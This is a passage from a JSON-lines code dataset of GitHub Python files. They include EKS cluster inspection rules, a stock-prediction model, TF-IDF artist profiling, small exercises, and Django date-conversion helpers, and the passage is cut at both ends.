Cluster Version\"\n url = \"https://aws.github.io/aws-eks-best-practices/scalability/docs/control-plane/#use-eks-124-or-above\"\n\n \n \n def check(self, resources: Resources):\n\n eksclient = boto3.client(\"eks\", region_name=resources.region)\n cluster_metadata = eksclient.describe_cluster(name=resources.cluster)\n versionStr = cluster_metadata[\"cluster\"][\"version\"]\n #version = int(versionStr.split('.')[-1))\n \n Info = \"EKS Cluster Version {}\".format(versionStr)\n \n self.result = Result(status=True, resource_type=\"EKS Cluster Version\", info=Info)\n\n \n \nclass get_EKS_cluster_endpoint_url(Rule):\n _type = \"cluster_wide\"\n pillar = \"cluster_data\"\n section = \"control_plane\"\n message = \"Get EKS Cluster Endpoint URL\"\n url = \"https://aws.github.io/aws-eks-best-practices/scalability/docs/control-plane/#use-eks-124-or-above\"\n\n\n def check(self, resources: Resources):\n checkStatus = True\n eksclient = boto3.client(\"eks\", region_name=resources.region)\n cluster_metadata = eksclient.describe_cluster(name=resources.cluster)\n cluster_endpoint = cluster_metadata[\"cluster\"][\"endpoint\"]\n endpoint_public_access = cluster_metadata[\"cluster\"][\"resourcesVpcConfig\"][\"endpointPublicAccess\"]\n endpoint_private_access = cluster_metadata[\"cluster\"][\"resourcesVpcConfig\"][\"endpointPrivateAccess\"]\n endpointAccessString = \"public: \" + str(endpoint_public_access) + \", \" + \"private: \" + str(endpoint_private_access)\n resource = endpointAccessString + \" \" + cluster_endpoint\n self.result = Result(status=checkStatus, resource_type=\"EKS Cluster Endpoint URL\",resources=[resource],)\n \n\n \nclass get_cluster_vpc_subnets(Rule):\n _type = \"cluster_wide\"\n pillar = \"cluster_data\"\n section = \"data_plane\"\n message = \"Get EKS Cluster VPC & Subnets\"\n url = \"https://aws.github.io/aws-eks-best-practices/scalability/docs/control-plane/#use-eks-124-or-above\"\n\n\n def check(self, resources: Resources):\n checkStatus = True\n eksclient = boto3.client(\"eks\", region_name=resources.region)\n cluster_metadata = eksclient.describe_cluster(name=resources.cluster)\n vpcId = cluster_metadata[\"cluster\"][\"resourcesVpcConfig\"][\"vpcId\"]\n subnetIds = cluster_metadata[\"cluster\"][\"resourcesVpcConfig\"][\"subnetIds\"]\n subnetIdsString = \" \".join(subnetIds)\n resource=f\"vpcId {vpcId} subnetIds {subnetIdsString}\"\n self.result = Result(status=checkStatus, resource_type=\"EKS Cluster VPC & Subnet Ids\",resources=[resource],)\n \n\n \nclass get_available_free_ips_in_vpc(Rule):\n _type = \"cluster_wide\"\n pillar = \"cluster_data\"\n section = \"data_plane\"\n message = \"Check Available Free IPs in EKS VPC\"\n url = \"https://aws.github.io/aws-eks-best-practices/scalability/docs/control-plane/#use-eks-124-or-above\"\n\n\n def check(self, resources: Resources):\n checkStatus = True\n eksclient = boto3.client(\"eks\", region_name=resources.region)\n cluster_metadata = eksclient.describe_cluster(name=resources.cluster)\n vpcId = cluster_metadata[\"cluster\"][\"resourcesVpcConfig\"][\"vpcId\"]\n subnetIds = cluster_metadata[\"cluster\"][\"resourcesVpcConfig\"][\"subnetIds\"]\n subnets = boto3.resource(\"ec2\").subnets.filter(\n Filters=[{\"Name\": \"vpc-id\", \"Values\": [vpcId]}]\n ) \n subnet_ids = [sn.id for sn in subnets]\n ec2client = boto3.client('ec2')\n subnetsList = ec2client.describe_subnets(SubnetIds=subnet_ids)\n \n totalAvailableIpAddressCount = 0\n for subnet in subnetsList['Subnets']:\n totalAvailableIpAddressCount += subnet['AvailableIpAddressCount']\n \n resource=f\"Availablle Free IPs {totalAvailableIpAddressCount}\"\n self.result = Result(status=checkStatus, resource_type=\"Available Free IPs in EKS VPC\",resources=[resource],)\n \n\n\nclass get_cluster_size_details(Rule):\n _type = \"cluster_wide\"\n pillar = \"cluster_data\"\n section = \"data_plane\"\n message = \"Get Cluster Size Details\"\n url = \"https://aws.github.io/aws-eks-best-practices/scalability/docs/control-plane/#use-eks-124-or-above\"\n\n\n def check(self, resources: Resources):\n checkStatus = True\n \n deployments = kubernetes.client.AppsV1Api().list_deployment_for_all_namespaces().items\n services = kubernetes.client.CoreV1Api().list_service_for_all_namespaces().items\n pods = kubernetes.client.CoreV1Api().list_pod_for_all_namespaces().items\n nodeList = (kubernetes.client.CoreV1Api().list_node().items)\n \n resource=f\"Services : {len(services)} Deployments : {len(deployments)} Pods: {len(pods)} Nodes: {len(nodeList)}\"\n \n self.result = Result(status=checkStatus, resource_type=\"Size of the Cluster\",resources=[resource],)\n \n\nclass get_nodegroups_provisioners(Rule):\n _type = \"cluster_wide\"\n pillar = \"cluster_data\"\n section = \"data_plane\"\n message = \"Get Node groups and Provisioners\"\n url = \"https://aws.github.io/aws-eks-best-practices/scalability/docs/control-plane/#use-eks-124-or-above\"\n\n\n def check(self, resources: Resources):\n checkStatus = True\n \n nodeList = (kubernetes.client.CoreV1Api().list_node().items)\n \n eksmnglist = set()\n selfmnglist=set()\n provisionerlist=set()\n linuxnglist=set()\n windowsnglist=set()\n \n for node in nodeList:\n labels = node.metadata.labels\n \n if 'eks.amazonaws.com/nodegroup' in labels.keys():\n nodeName = labels['eks.amazonaws.com/nodegroup']\n eksmnglist.add(nodeName)\n elif 'alpha.eksctl.io/nodegroup-name' in labels.keys():\n nodeName = labels['alpha.eksctl.io/nodegroup-name']\n selfmnglist.add(nodeName)\n elif 'karpenter.sh/provisioner-name' in labels.keys():\n nodeName = labels['karpenter.sh/provisioner-name']\n provisionerlist.add(nodeName)\n else:\n nodeName = \"Unkown-nodegroup\"\n \n if labels['kubernetes.io/os'] == \"linux\":\n linuxnglist.add(nodeName)\n elif labels['kubernetes.io/os'] == \"windows\":\n windowsnglist.add(nodeName)\n \n linux_ng = \" \".join(list(linuxnglist))\n windows_ng = \" \".join(list(windowsnglist))\n resource=f\"EKS MNG : {len(eksmnglist)} Self MNG : {len(selfmnglist)} Provisioners: {len(provisionerlist)} Linux NGs: {linux_ng} Windows NGs: {windows_ng}\"\n self.result = Result(status=checkStatus, resource_type=\"Node groups and Provisioners\",resources=[resource],)\n \n\nclass get_fargate_profiles(Rule):\n _type = \"cluster_wide\"\n pillar = \"cluster_data\"\n section = \"data_plane\"\n message = \"Get EKS Fargate Profiles\"\n url = \"https://aws.github.io/aws-eks-best-practices/scalability/docs/control-plane/#use-eks-124-or-above\"\n\n\n def check(self, resources: Resources):\n \n eksclient = boto3.client(\"eks\", region_name=resources.region) \n response = eksclient.list_fargate_profiles(clusterName=resources.cluster,)\n \n Info = \"EKS Fargate Profiles: \" + \" \".join(response['fargateProfileNames'])\n #print(pprint.pformat(response['fargateProfileNames'], indent=4))\n \n self.result = Result(status=True, resource_type=\"EKS Fargate Profiles\", info=Info)\n \n","repo_name":"abhisnan/hardeneks","sub_path":"hardeneks/cluster_wide/cluster_data/cluster_data.py","file_name":"cluster_data.py","file_ext":"py","file_size_in_byte":7955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"60"} +{"seq_id":"44541279710","text":"import json\nimport time\nimport logging\nimport traceback\nfrom uuid import uuid4\n\nfrom yukon.domain.registers.apply_configuration_request import ApplyConfigurationRequest\nfrom yukon.domain.registers.update_register_request import UpdateRegisterRequest\nfrom yukon.services.api import is_configuration_simplified, add_register_update_log_item\nfrom yukon.services.value_utils import unexplode_value\nfrom yukon.domain.god_state import GodState\n\nlogger = logging.getLogger(__name__)\n\n\nasync def do_apply_configuration_work(state: GodState, config: ApplyConfigurationRequest) -> None:\n if config.node_id and not config.is_network_config:\n data = json.loads(config.configuration)\n if is_configuration_simplified(data):\n at_least_one_register_was_modified = False\n for register_name, register_value in data.items():\n prototype_string = state.avatar.avatars_by_node_id[int(config.node_id)].registers_exploded_values.get(\n register_name, None\n )\n if prototype_string is None:\n logger.log(logging.ERROR, \"Register %s does not exist on node %d\" % (register_name, config.node_id))\n add_register_update_log_item(state, register_name, None, config.node_id, False)\n continue\n at_least_one_register_was_modified = True\n prototype = unexplode_value(prototype_string)\n unexploded_value = unexplode_value(register_value, prototype)\n state.queues.god_queue.put_nowait(\n UpdateRegisterRequest(uuid4(), register_name, unexploded_value, config.node_id, time.time())\n )\n if not at_least_one_register_was_modified:\n logger.warning(\"No registers were modified on node %d\", config.node_id)\n else:\n for potential_node_id, v in data.items():\n if potential_node_id == \"__file_name\":\n continue\n for register_name, value in v.items():\n if isinstance(value, str):\n logger.debug(\"Do something\")\n value = json.loads(value)\n unexploded_value = unexplode_value(value)\n state.queues.god_queue.put_nowait(\n UpdateRegisterRequest(uuid4(), register_name, unexploded_value, config.node_id, time.time())\n )\n elif config.is_network_config:\n logger.debug(\"Setting configuration for all configured nodes\")\n data = json.loads(config.configuration)\n for node_id, registers_values_exploded in data.items():\n if \"__\" in node_id:\n continue\n # If register_values_exploded is not a dict, it is an error\n if not isinstance(registers_values_exploded, dict):\n logger.error(f\"Configuration for node {node_id} is not a dict\")\n continue\n for k, v in registers_values_exploded.items():\n state.queues.god_queue.put_nowait(\n UpdateRegisterRequest(uuid4(), k, unexplode_value(v), int(node_id), time.time())\n )\n else:\n tb = traceback.format_exc()\n logger.critical(tb)\n","repo_name":"OpenCyphal/yukon","sub_path":"yukon/services/cyphal_worker/update_configuration_work.py","file_name":"update_configuration_work.py","file_ext":"py","file_size_in_byte":3272,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"60"} +{"seq_id":"27851365773","text":"#Authors: Duy Thanh Tran, Prof. Jun-Ho Huh, Prof. Jae-Hwan Kim\r\n#Data Science Lab - KMOU\r\n#Department of Data Science, (National) Korea Maritime and Ocean University, Busan 49112, Republic of Korea.\r\n#Created Date: May-17/2022\r\n# Model 1 (trend)\r\nfrom sklearn.linear_model import LinearRegression\r\n\r\n# Model 2\r\nfrom sklearn.neighbors import KNeighborsRegressor\r\n\r\n# Create LinearRegression and KNeighborsRegressor hybrid for LucyHybrid object\r\nfrom LucyDataExecutor import LucyDataExecutor\r\nfrom LucyHybrid import LucyHybrid\r\nfrom LucyUtil import LucyUtil\r\n\r\nplot_params = dict(\r\n color=\"0.75\",\r\n style=\".-\",\r\n markeredgecolor=\"0.25\",\r\n markerfacecolor=\"0.25\",\r\n legend=False,\r\n)\r\n\r\ndataexec=LucyDataExecutor()\r\ndataexec.load_data()\r\ndataexec.normalize(2017)\r\ndataexec.setup_feature_target()\r\n\r\nmodel = LucyUtil.loadmodel(\"models\\ElasticNet_ExtraTreesRegressor.zip\")\r\n\r\ntraindate=\"2017-07-01\"\r\nvaliddate=\"2017-07-02\"\r\ny_train, y_valid = dataexec.y_train_valid(traindate, validdate)\r\nX1_train, X1_valid = dataexec.X1_train_valid(traindate,validdate)\r\nX2_train, X2_valid = dataexec.X2_train_valid(traindate,validdate)\r\n#call predict method\r\ny_fit = model.predict(X1_train, X2_train).clip(0.0)\r\ny_pred = model.predict(X1_valid, X2_valid).clip(0.0)\r\n\r\nmetric=model.evaluate(y_train,y_fit,y_valid,y_pred)\r\nmetric.printmetric()\r\n","repo_name":"thanhtd32/LucyHybrid","sub_path":"RunLoadSingle_LucyHybridModel.py","file_name":"RunLoadSingle_LucyHybridModel.py","file_ext":"py","file_size_in_byte":1338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"4157065764","text":"import matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nimport datetime\nfrom datetime import date\nimport yfinance as yf\nimport numpy as np\nfrom io import BytesIO\nimport base64\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.metrics import mean_squared_error\n\n\nclass Stocks:\n def __init__(self, symbol, algorithm, forcast_time_span):\n self.symbol = symbol\n self.algorithm = algorithm\n self.data_points = 1000\n self.forcast_time_span = forcast_time_span\n self.delta_days = 720\n self.training_segment = None\n self.start = None\n self.end = None\n self.steps = None\n self.data = None\n self.x_train = None\n self.y_train = None\n self.x_test = None\n self.y_test = None\n self.steps = None\n self.plot = None\n\n if algorithm in ['randomforest', 'lstm']:\n self.algorithm = algorithm\n else:\n raise ValueError(f'Machine learning algorithm: {algorithm} is not available.')\n\n if forcast_time_span in ['1d', '5d', '1mo', '6mo', '1y']:\n self.forcast_time_span = forcast_time_span\n else:\n raise ValueError(f'Forcast time span of {forcast_time_span} is not available')\n\n # Steps are used for number of iterations to self feed back into the prediction/forcast model.\n # The granularity for these forcast time spans are something we will need to experiment with to achieve\n # the best prediction accuracy.\n if forcast_time_span == '1d':\n # About 7 hours in a trading day\n self.steps = 7\n self.granularity = '1h'\n if forcast_time_span == '5d':\n # About 45 hours in a 5-day trading period\n self.steps = 45\n self.granularity = '1h'\n if forcast_time_span == '1mo':\n # 30 days in a month\n self.steps = 30\n self.granularity = '1d'\n if forcast_time_span == '6mo':\n # 6 months has 26 weeks x 5 trading days\n self.steps = 130\n self.granularity = '1d'\n self.delta_days = 4000\n if forcast_time_span == '1y':\n # 1 year has 52 weeks x 5 trading days\n self.steps = 260\n self.granularity = '1d'\n self.delta_days = 4000\n\n self.training_segment = 4 * self.steps\n\n\n def forcast_test(self): \n plt.cla() \n model = self.__train()\n prediction = self.__predict(model)\n return prediction\n\n def __train(self):\n if self.algorithm == 'randomforest':\n model = self.__random_forest()\n if self.algorithm == 'lstm':\n model = self.__lstm()\n return model\n\n def __random_forest(self):\n delta = datetime.timedelta(days=self.delta_days)\n start_date = date.today() - delta\n end_date = date.today()\n if self.forcast_time_span in ['1d', '5d']:\n data = yf.download(self.symbol, start=start_date.strftime('%Y-%m-%d'), end=end_date.strftime('%Y-%m-%d'),\n interval=self.granularity)\n if self.forcast_time_span in ['1mo', '6mo']:\n data = yf.download(self.symbol, start=start_date.strftime('%Y-%m-%d'), end=end_date.strftime('%Y-%m-%d'),\n interval=self.granularity)\n if self.forcast_time_span in ['1y']:\n data = yf.download(self.symbol, start=start_date.strftime('%Y-%m-%d'), end=end_date.strftime('%Y-%m-%d'),\n interval=self.granularity)\n self.data = data\n price_data = self.data.iloc[:]['Open'].values\n\n # Limit amount of data points. Too much data causes increased training time.\n if len(price_data) >= self.data_points:\n price_data = self.data.iloc[:]['Open'].values[-self.data_points:]\n else:\n price_data = self.data.iloc[:]['Open'].values[:]\n\n # Method to create training\n def create_dataset(dataframe):\n x = []\n y = []\n for i in range(self.training_segment, len(dataframe)):\n x.append(dataframe[i - self.training_segment:i])\n y.append(dataframe[i])\n x = np.array(x)\n y = np.array(y)\n return x, y\n\n self.x_train, self.y_train = create_dataset(price_data[0:-(self.training_segment + self.steps)])\n self.x_test = np.array(price_data[-(self.training_segment + self.steps): -self.steps]).reshape(1, -1)\n self.y_test = np.array(price_data[-self.steps:])\n # self.x_train, self.y_train = make_regression(n_features=4, n_informative=2, random_state=0, shuffle=False)\n model = RandomForestRegressor(max_depth=20, random_state=123, n_estimators=500, max_features='sqrt')\n model.fit(self.x_train, self.y_train)\n prediction = self.__predict(model)\n mse = mean_squared_error(self.y_test, prediction[0])\n print(mse)\n\n\n self.data['Open'][-(self.training_segment + self.steps):-self.steps].plot(label='Training data')\n self.data['Open'][-self.steps:].plot(label='Testing data')\n plt.plot(self.data.index[-self.steps:], prediction[0], label='Prediction data')\n plt.legend(loc='upper center')\n \n\n buffer = BytesIO()\n plt.savefig(buffer, format='png')\n buffer.seek(0)\n image_png = buffer.getvalue()\n buffer.close()\n\n graphic = base64.b64encode(image_png)\n graphic = graphic.decode('utf-8')\n\n self.plot = graphic\n\n return model\n\n def __lstm(self):\n model = None\n return model\n\n def __predict(self, model):\n prediction = self.x_test\n\n for i in range(self.steps):\n prediction = np.append(prediction, model.predict(prediction))\n prediction = prediction[-self.training_segment:].reshape(1, -1)\n return prediction[:, -self.steps:]\n","repo_name":"paochouayang/MachineLearningStockPredictionProject","sub_path":"mlstocks/stocks_site/stockPredict.py","file_name":"stockPredict.py","file_ext":"py","file_size_in_byte":5954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"73163548030","text":"import os\nimport numpy as np\nimport tensorflow as tf\n\nsymbols = dict()\nsymbols['EOS_CHAR'], symbols['EOS_INDEX'] = '', 0\nsymbols['UNK_CHAR'], symbols['UNK_INDEX'] = '', 1\nsymbols['SOS_CHAR'], symbols['SOS_INDEX'] = '', 2\n\n\ndef force_mkdir(dir_path):\n '''\n This function is used to create a directory if it doesn't exists\n '''\n try:\n os.mkdir(dir_path)\n except:\n pass\n\n\ndef loadGlove(embedding_file, params):\n '''\n This function is used to load the embedding\n :param embedding_file: The path to embedding_file\n :param params: The parameters for its extraction\n '''\n EOS_CHAR, SOS_CHAR, UNK_CHAR = symbols['EOS_CHAR'], symbols['SOS_CHAR'], symbols['UNK_CHAR']\n vocab = [EOS_CHAR, UNK_CHAR, SOS_CHAR]\n embedding = [np.zeros((params.embed_dim,)), np.random.normal(size=(params.embed_dim,)), np.ones((params.embed_dim,))]\n if embedding_file.endswith('txt'):\n file = open(embedding_file, 'r+')\n for index, line in enumerate(file.readlines()):\n row = line.strip().split(' ')\n vocab.append(row[0])\n embedding.append([float(x) for x in row[1:]])\n print('Glove word vectors are Loaded!')\n file.close()\n return vocab, np.asarray(embedding)\n\n\ndef get_bleu(sess, batch_size, bleu_score):\n '''\n This function returns the bleu score\n '''\n bleu_score_temp = []\n while True:\n try:\n bleu_score_temp.append(sess.run(bleu_score, feed_dict={batch_size: 1}))\n except tf.errors.OutOfRangeError:\n break\n return sum(bleu_score_temp) / len(bleu_score_temp)\n\n\ndef rev_vocab(vocab):\n '''\n This function returns the reverse vocab dictionary\n '''\n rev_vocab = dict()\n for index, val in enumerate(vocab):\n rev_vocab[index] = val\n return rev_vocab\n\ndef generate_output(output, output_file, embedding_file):\n '''\n This function converts the output from index to text based on embedding_file and save it in output_file\n '''\n vocab, embedding = loadGlove(embedding_file)\n reverse_vocab = rev_vocab(vocab)\n output_file = open(output_file, 'w+')\n for line in output:\n temp_summary = np.vectorize(reverse_vocab.get)(line)\n a = ' '.join(temp_summary[:-1]) + '\\n'\n output_file.write(a)\n output_file.close()\n","repo_name":"akashr050/abstractive_summarizer","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2178,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"20012509335","text":"toppings = ['pepperoni','pineapple','cheese','sausage','olives','anchovies','mushrooms']\nprices = [2, 6, 1, 3, 2, 7, 2]\n\nnum_pizzas = len(toppings)\nprint('We sell '+str(num_pizzas)+ ' different kinds of pizza!')\n\npizzas = list(zip(prices, toppings))\nprint('pizzas '+ str(pizzas))\n\npizzas.sort()\nprint('pizzas sort()' + str(pizzas))\n\ncheapest_pizza = pizzas[0]\npriciest_pizza = pizzas[-1]\n\n#Slice the pizzas list and store the 3 lowest cost pizzas in a list called three_cheapest.\nthree_cheapest = pizzas[0:3]\nprint('three_cheapest' + str(three_cheapest))\n\n#Your boss wants you to do some research on $2 slices. \nnum_two_dollar_slices = prices.count(2)\nprint('num_two_dollar_slices '+ str(num_two_dollar_slices))\n","repo_name":"ssaulrj/codes-python","sub_path":"codeacademy-python3/lists/list_exercise_pizza.py","file_name":"list_exercise_pizza.py","file_ext":"py","file_size_in_byte":712,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"38240608385","text":"import csv, os, sys, re, nltk, math, operator\nfrom pprint import pprint\nfrom nltk.corpus import stopwords\n \n\n#artist,song,link,text\nclass artistprofiling(object):\n songsPerArtist = {}\n all_words = {}\n\n # Initializes the class, opens the file and puts the values of rows into a global list called 'songs' \n # in which they are stored in a dictionary format.\n def __init__(self):\n data = csv.reader(iter(sys.stdin.readline, ''))\n next(data)\n for songRow in data:\n artist = songRow[0]\n lyrics = songRow[3]\n if artist not in self.songsPerArtist:\n self.songsPerArtist[artist] = lyrics\n else: # We concatenate the lyrics of all the songs per artists into document.\n self.songsPerArtist[artist] += lyrics\n\n\n # the document has now become an artist with all the lyrics compiled together and so we calculat the document frequency and store it in a map.\n def calculcateDocumentFrequency(self):\n all_words = {}\n #get that row of lyrics\n for artist in self.songsPerArtist:\n lyrics = self.songsPerArtist[artist]\n words = self.preProcessLyrics(lyrics)\n #we only need the word to appear once so we check that specific word how many times\n #it appears in all the other documents\n words = set(words)\n for word in words:\n if word not in all_words:\n all_words[word] = 1\n else:\n all_words[word] += 1\n return all_words\n\n # Calculates the amount of times a term appears in all the songs of an artist. The lyrics that we pass are a concantenation of all the artists song lyrics.\n def calculateTermFrequency(self, lyrics):\n word_frequency = {}\n words = self.preProcessLyrics(lyrics)\n for word in words:\n if word not in word_frequency.keys():\n word_frequency[word] = 1\n else:\n word_frequency[word] += 1\n return word_frequency\n\n # Uses the values from the document frequency and term frequency \n def calculcatetfIdf(self, song):\n words_idf = self.calculcateDocumentFrequency()\n N = len(self.songsPerArtist)\n all_words = {}\n \n words_tf = self.calculateTermFrequency(song)\n #get all the words frequency for that song\n for word in words_tf:\n #get that word and get the idf for that word\n idf = words_idf[word]\n idf = math.log10(N/idf)\n tf = 1+ math.log10(words_tf[word])\n tf_idf = tf * idf\n all_words[word] = tf_idf\n\n \n top_words = dict(sorted(all_words.items(), key=operator.itemgetter(1), reverse=True)[:100])\n return top_words\n\n # This method removes the stopwords, removes punctuation and sets the words to lower case.\n def preProcessLyrics(self, lyrics):\n stop_words = set(stopwords.words('english')) \n #get an array of all the words\n words = re.findall(r'\\w+', lyrics)\n filtered_lyrics = []\n for word in words:\n if word not in stop_words:\n filtered_lyrics.append(word)\n return filtered_lyrics\n\n # Pretty printing ;)\n def getProfilesForAllArtists(self):\n for artist in self.songsPerArtist:\n print(artist)\n words_and_tf_idf = self.calculcatetfIdf(self.songsPerArtist[artist])\n for word in words_and_tf_idf:\n print(word + \": \" + str(words_and_tf_idf[word]))\n \n\n#Instatiate and run\nap = artistprofiling()\nap.getProfilesForAllArtists()\n\n","repo_name":"rachy95/bigData","sub_path":"artistprofiling.py","file_name":"artistprofiling.py","file_ext":"py","file_size_in_byte":3664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"21989331320","text":"'''\nCreated on Oct 24, 2017\n\n@author: Tudor\n'''\n\nfrom total_expenses import calculate_expenses, calculate_expenses_by_type\n\ndef get_type(my_type, V):\n #This method searches the type of an expense in the list V\n #input: my_type = the type of expense that is searched\n # V = the list of expenses\n #output: the position 'i' in the list of the searched expense type, or -1 is it doesn't exist\n \n for i in range(0, len(V)):\n if V[i][0] == my_type:\n return i\n return -1\n\ndef quicksort(left, right, V):\n #This is the well known quicksort algorithm, which sorts a list V in a Divide and Conquer method\n #input: left = the lower bound of the interval that we sort\n # right = the upper bound of the interval that we sort\n #output: V = the sorted list\n \n i = left\n j = right\n mid = (i + j) >> 1\n pivot = V[mid][1]\n while i <= j:\n while V[i][1] < pivot:\n i = i + 1\n while V[j][1] > pivot:\n j = j - 1\n if i <= j:\n tmp = V[i]\n V[i] = V[j]\n V[j] = tmp\n i = i + 1\n j = j - 1\n if left < j:\n quicksort(left, j, V)\n if i < right:\n quicksort(i, right, V)\n \ndef sort_by_apartment(apartments):\n #This method writes the list of apartments sorted ascending by total amount of expenses.\n #input: apartment = the list of apartments\n #output V = the sorted list of apartments\n V = []\n calculated = [False] * 10005\n for apartment in apartments:\n if calculated[apartment[\"apartment_id\"]]:\n continue\n calculated[apartment[\"apartment_id\"]] = True\n val = calculate_expenses(apartment[\"apartment_id\"], apartments)\n V.append((apartment[\"apartment_id\"], val))\n \n quicksort(0, len(V) - 1, V)\n print(\"The apartments sorted ascending by total amount of expenses: \")\n for i in V:\n print(i[0], \"with\", i[1], \"RON\")\n return V\n\n \ndef sort_by_type(apartments):\n #This method writes the total amount of expenses for each type, sorted ascending by amount of money.\n #input: apartment = the list of apartments\n #output V = the sorted list of apartments\n V = []\n for apartment in apartments:\n pos = get_type(apartment[\"type\"], V)\n val = calculate_expenses_by_type(apartment[\"type\"], apartments)\n if pos == -1: #if the current expense type doesn't exist in the list V\n V.append((apartment[\"type\"], val))\n quicksort(0, len(V) - 1, V)\n print(\"The total amount of expenses for each type, sorted ascending by amount of money:\")\n for i in V:\n print(i[0], \"with\", i[1], \"RON\") \n return V \n \n ","repo_name":"TudorMaxim/assignment3-4Python","sub_path":"sort_utility.py","file_name":"sort_utility.py","file_ext":"py","file_size_in_byte":2713,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"7746746936","text":"# -*- coding: utf8 -*-\nfrom phystricks import *\ndef figureSIZwqIZ():\n pspict,fig = SinglePicture(\"figureSIZwqIZ\")\n pspict.dilatation_X(0.8)\n pspict.dilatation_Y(0.5)\n\n x=var('x')\n\n F=[]\n F.append(phyFunction(x**2).graph(-2.5,2.5))\n F.append(phyFunction( 1-x**2 ).graph(-2,2))\n F.append(phyFunction( x+1 ).graph(-4,3))\n F.append(phyFunction( (x+2)**2 ).graph(-4,0.5))\n\n F[0].put_mark(0.2,0,\"\\( C_1\\)\",pspict=pspict,position=\"corner\")\n F[1].put_mark(0.2,0,\"\\( C_2\\)\",pspict=pspict,position=\"corner\")\n F[2].put_mark(0.2,0,\"\\( C_3\\)\",pspict=pspict,position=\"corner\")\n F[3].put_mark(0.2,0,\"\\( C_4\\)\",pspict=pspict,position=\"corner\")\n\n pspict.DrawGraphs(F)\n\n pspict.axes.no_graduation()\n pspict.axes.single_axeX.put_mark(0.2,-45,\"\\( x\\)\",pspict=pspict,position=\"corner\")\n pspict.axes.single_axeY.put_mark(0.2,45,\"\\( y\\)\",pspict=pspict,position=\"corner\")\n #pspict.DrawDefaultGrid()\n pspict.DrawDefaultAxes()\n\n fig.no_figure()\n fig.conclude()\n fig.write_the_file()\n","repo_name":"LaurentClaessens/smath","sub_path":"phystricksfigureSIZwqIZ.py","file_name":"phystricksfigureSIZwqIZ.py","file_ext":"py","file_size_in_byte":1023,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"60"} +{"seq_id":"11671776973","text":"from datetime import datetime\nfrom datetime import date\nfrom .models import *\nfrom django.contrib import messages\nfrom django.shortcuts import redirect\n\n\ndef try_parsing_date(text):\n for fmt in ('%d-%m-%Y', '%d.%m.%Y', '%d/%m/%Y'):\n try:\n return datetime.strptime(text, fmt)\n except ValueError:\n ## format is not valid\n pass\n # raise ValueError('no valid date format found')\n return None\n\n# use after get data and want to save it\ndef BD_str_to_AD_str(date_str): # change BD to AD as date(พ.ศ. -> ค.ศ.) d/m/Y(str) -> date\n # change BC year str to AC str\n d, m, y = date_str.split(\"/\",2)\n AD_y = str(int(y) - 543 )\n AD_str = d+'/'+m+'/'+AD_y\n return AD_str\n\n# use when you send data to show at front-end\ndef AD_date_to_BD_str(dateObj): # change AD to BD as string(ค.ศ. -> พ.ศ.) date -> d/m/Y (str)\n # import pdb; pdb.set_trace()\n if isinstance(dateObj, date):\n AD_str = dateObj.strftime('%d/%m/%Y') # date to str\n else:\n AD_str = dateObj\n # change AC year str to BC str\n d, m, y = AD_str.split(\"/\",2)\n BD_y = str(int(y) + 543 )\n BD_str = d+'/'+m+'/'+BD_y \n \n return BD_str\n\n\ndef packDataToDict(request,modelInput,modelFormInput,path,user_id_input,dict_send):\n input_pack = {}\n input_pack['request'] = request\n input_pack['modelInput'] = modelInput\n input_pack['modelFormInput'] = modelFormInput\n input_pack['path'] = path\n input_pack['user_id_input'] = user_id_input\n input_pack['dict_send'] = dict_send\n return input_pack\n\ndef fixDateinPostForm(path, form, toAC=False):\n \n if toAC:\n ### because we cannot use '' != '' to check empty string. \n ### So, just check that variable in if\n # is_null = ''\n trans_func = BD_str_to_AD_str\n else:\n # is_null = None\n trans_func = AD_date_to_BD_str\n\n #### preprocess some data\n if path == \"personal_info\":\n date_value = form.data['birth_date'] \n if date_value: # if it's None or '', it will get False \n form.data['birth_date'] = trans_func(date_value)\n \n if path == \"work_info\":\n start_service_date = form.data['start_service_date'] \n if start_service_date:\n form.data['start_service_date'] = trans_func(start_service_date)\n # import pdb; pdb.set_trace()\n end_service_date = form.data['end_service_date'] \n if end_service_date:\n form.data['end_service_date'] = trans_func(end_service_date)\n \n start_PW_date = form.data['start_PW_date'] \n if start_PW_date:\n form.data['start_PW_date'] = trans_func(start_PW_date) \n\n if path == \"insignia\":\n date_value = form.data['date1'] \n if date_value: \n form.data['date1'] = trans_func(date_value)\n\n return form\n\n\ndef fixDateinRegularForm(path, form):\n is_null = None\n trans_func = AD_date_to_BD_str\n if path == \"personal_info\":\n date_value = form['birth_date'].value() \n if date_value != is_null : \n form['birth_date'].initial = trans_func(date_value)\n\n if path == \"work_info\":\n start_service_date = form['start_service_date'].value() \n if start_service_date != is_null :\n form['start_service_date'].initial = trans_func(start_service_date)\n \n end_service_date = form['end_service_date'].value() \n if end_service_date != is_null :\n form['end_service_date'].initial = trans_func(end_service_date)\n \n start_PW_date = form['start_PW_date'].value() \n if start_PW_date != is_null :\n form['start_PW_date'].initial = trans_func(start_PW_date) \n \n if path == \"insignia\":\n date_value = form['date1'].value() \n if date_value != is_null :\n form['date1'].initial = trans_func(date_value)\n\n\n return form\n\ndef tryToSave(ip_p, userInput, form):\n\n form = fixDateinPostForm(ip_p['path'], form,toAC=True)\n \n if form.is_valid():\n recipe = form.save(commit=False)\n recipe.user = userInput \n \n\n if ip_p['path'] == \"personal_info\": \n recipe.card_number = userInput.username\n birthDate = try_parsing_date(form.data['birth_date'])\n # birthDate = form.data['birth_date']\n if birthDate:\n workInfoObj = WorkInfo.objects.get(user=userInput.id)\n if birthDate.month < 10:\n new_date = date(birthDate.year + 60 ,9,30)\n else:\n new_date = date(birthDate.year + 61 ,9,30)\n workInfoObj.end_service_date = new_date\n 